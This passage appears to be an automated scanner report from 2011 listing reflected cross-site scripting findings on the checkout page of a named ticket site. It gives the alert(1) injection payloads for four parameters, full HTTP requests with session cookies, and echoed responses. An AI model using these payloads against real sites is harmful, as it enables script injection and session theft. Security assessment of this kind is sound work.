0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiYGOwdGOgxyZWZlcmVyIgGZaHR0cDovL2JpbmcuZmFuc25hcC5jb20vdTItdGlja2V0cy91Mi13aXRoLWludGVycG9sLXJlc2NoZWR1bGVkLWZyb20tNzE5L2p1bHktMjAtMjAxMS0zODk2Njk%2FdXRtX3NvdXJjZT0xOTg3JmFjaz1odHRwJTNhJTJmJTJmd3d3LmJpbmcuY29tJTJmcyUyZmFjay5odG1sOg12aXNpdF9pZGn8JAJK6zoPdmlzaXRvcl9pZCIAOg5zdHlsZV9pZHNJIgAGOwdGOghsb2N7CjsQZhozMi43ODI0OTk5OTk5OTk5OTkAj1w7EWYbLTk2LjgyMDcwMDAwMDAwMDAwMgD08TsSaRI7EyIWRGFsbGFzLUZvcnQgV29ydGg7FEAa--525fcfcbaaad5a8cd8546f8fcd40a32f01ea9edd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12065
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
t: false, ticketSetId: 415814268, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 50.0, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bingedce3';alert(1)//af024862ed3', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.89. http://bing.fansnap.com/checkout/index/415814268 [ctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the ctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b3e'%3balert(1)//136c4a6627e was submitted in the ctx parameter. This input was echoed as 12b3e';alert(1)//136c4a6627e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv12b3e'%3balert(1)//136c4a6627e&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 20
ETag: "a41f5ce3feb111485cfaee0b976315ca"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4C%2FDM%2BNBjoLb2Zmc2V0af6QnQ%3D%3D--ffe35ae5260785247f5f10915d7907d41934161c; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11936
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 415814268, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv12b3e';alert(1)//136c4a6627e'), fakeResult: 'none', salePrice: 50.0, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.90. http://bing.fansnap.com/checkout/index/415814268 [poctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the poctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db107'%3balert(1)//a5bb0f63d2 was submitted in the poctx parameter. This input was echoed as db107';alert(1)//a5bb0f63d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3Bdb107'%3balert(1)//a5bb0f63d2&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 24
ETag: "30746182b6a26d09e669bed81318c644"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BO3ZuPBjoLb2Zmc2V0af6QnQ%3D%3D--32eff0426ea4eec8b3d79233fc816399eae3ea56; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11852
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;db107';alert(1)//a5bb0f63d2', afm: '' });
//]]>
...[SNIP]...

4.91. http://bing.fansnap.com/checkout/index/415814268 [quantity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2bf1d%3balert(1)//47ce35f909f was submitted in the quantity parameter. This input was echoed as 2bf1d;alert(1)//47ce35f909f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=22bf1d%3balert(1)//47ce35f909f&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 18
ETag: "13eb610249b4dfb41c21ea1bea4553d6"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BD9FePBjoLb2Zmc2V0af6QnQ%3D%3D--be481d61e52995bc547c4772a8bd39a722dec26b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11879
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 415814268, quantity: 22bf1d;alert(1)//47ce35f909f, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.03
...[SNIP]...

4.92. http://bing.fansnap.com/checkout/index/415814268 [uet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the uet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36984'%3balert(1)//221666173fb was submitted in the uet parameter. This input was echoed as 36984';alert(1)//221666173fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966936984'%3balert(1)//221666173fb HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 21
ETag: "42e63857998fefbd847dd56d06e79526"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Awb4aQBjoLb2Zmc2V0af6QnQ%3D%3D--7f92d79f54616a72244ca9f33d9f5acace722a83; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11853
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
